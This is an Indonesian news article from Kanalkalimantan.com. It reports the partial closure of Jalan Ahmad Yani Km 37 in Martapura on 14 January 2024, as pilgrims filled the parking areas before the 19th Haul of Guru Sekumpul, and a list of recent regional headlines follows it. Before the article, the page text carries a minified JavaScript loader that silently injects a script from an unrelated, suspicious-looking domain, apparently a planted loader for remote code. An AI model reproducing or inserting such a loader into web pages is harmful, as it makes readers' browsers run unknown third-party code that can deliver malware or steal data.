(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Banjar

Satu Ruas A Yani Km 37 Martapura Menuju Sekumpul Ditutup, Jemaah Putar Balik Cari Kantong Parkir Kosong


KANALKALIMANTAN.COM, MARTAPURA – Kepadatan jemaah menjelang Haul ke-19 Guru Sekumpul semakin memadati Kota Martapura, Kota Banjarbaru, dan sekitarnya, Minggu (14/1/2024) pukul 14.00 Wita.

Kantong-kantong parkir yang disediakan di sekitar Jalan Ahmad Yani dari bundaran Simpang Empat Banjarbaru hingga simpang empat Masjid Syiarussahalihin menuju Sekumpul sudah penuh kendaraan bermotor jemaah.

Kepadatan itu membuat relawan bersama petugas kepolisian harus melakukan penutupan jalan bagi kendaraan roda dua ataupun roda empat yang akan menuju kawasan Sekumpul.

Baca juga: Kapal Jemaah dari Perbatasan Malaysia Sandar di Dermaga Murung Masjid

Penutupan dilakukan pada salah satu ruas Jalan Ahmad Yani kilometer 37 tepat di depan Pusat Informasi Pariwisata dan Penggosokan Intan (PIPP) Martapura. Sementara ruas sebelahnya dari arah Sekumpul menuju bundaran Simpang Empat Banjarbaru tetap dibuka.

Para pengendara disuruh untuk putar balik mencari kantong parkir yang masih tersedia.

KBO Satlantas Polres Banjar Iptu Tri mengatakan, penutupan satu ruas jalan tersebut sudah dilakukan sejak sekitar pukul 14.00 Wita.

Baca juga: Kawasan Kubah Sekumpul Sudah Padat, Tenda di Posko Sungai Ulin Tampung 3 Ribu Orang

Penutupan dilakukan setelah kantong-kantong parkir di kawasan Sekumpul penuh dan menghindari penumpukan kendaraan di jalan raya.

“Kantong-kantong parkir di simpang empat Sekumpul sampai jalan Rahayu kemudian Kampung Baru semua sudah padat,” katanya.

Ipda Tri menyebut penutupan jalan menuju Sekumpul dilakukan secara bertahap, awalnya di jalan depan Dekranasda kilometer 38 Martapura kemudian maju beberapa ratus meter depan komplek Sa’adah.

Baca juga: Aroma Masakan Makan Gratis Sepanjang Jalan Menuju Haul ke-19 Sekumpul

“Kemudian Saadah sudah penuh baru ini yang terakhir untuk wilayah Kabupaten Banjar,” kata Ipda Tri ditemui di kawasan penutupan jalan A Yani kilometer 37.

Pengendara yang disuruh putar balik kata Tri diarahkan untuk menuju dan memarkirkan kendaraanya ke wilayah perbatasan Kota Banjarbaru dan Martapura atau sekitar Gunung Runggeng yang masih tersedia kantong parkir.

“Setelah ini mungkin di Gunung Runggeng penuh, total di bundaran Banjarbaru,” katanya.

Baca juga: Terus Naik, Relawan Pantau Debit Air Sungai Martapura

Penutupan terakhir kata Tri nantinya akan dilakukan di bundaran simpang empat Banjarbaru saat Jalan Ahmad Yani menuju Sekumpul sudah penuh jemaah.

“Kalau penutupan di Simpang Empat Banjarbaru terakhir itu sudah,” pungkasnya. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Muhammad Andi

Recent Posts

Nasdem-PKS Koalisi di Pilwali Banjarbaru, Darmawan Jaya Siap Tantang Petahana

KANALKALIMANTAN.COM, BANJARBARU - Nama Darmawan Jaya Setiawan menjadi orang pertama yang menyerahkan formulir pendaftaran penjaringan… Read More

46 menit ago

Kades Tumbang Mangkutup Apresiasi Kunjungan Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas, Erlin Hardi bersama jajarannya menghadiri kegiatan silaturahmi… Read More

2 jam ago

Monte All Star Banjarmasin Juara Turnamen Paman Birin Trophy U-45 Puma Legend 2024

KANALKALIMANTAN.COM, BANJARBARU - Monte All Star dari Banjarmasin juara Turnamen Sepak Bola Paman Birin Trophy… Read More

3 jam ago

Pj Bupati Kapuas Erlin Hardi ke Desa Tumbang Mangkutup

KANALKALIMANTAN.COM, KUALA KAPUAS - Penjabat (Pj) Bupati Kapuas, Erlin Hardi bersilaturahmi dengan masyarakat Desa Tumbang… Read More

16 jam ago

Satgas TMMD Beri Penyuluhan Pertanian dan Perikanan di Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Setelah program non fisik sosialisasi PHBS (Perilaku Hidup bersih Sehat) dan masalah… Read More

16 jam ago

Banjarbaru Posisi Kedua Klasemen Sementara Popda Kalsel 2024

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah cabang olahraga (cabor) unggulan membawa kontingen Kota Banjarbaru bertengger di posisi… Read More

19 jam ago

This website uses cookies.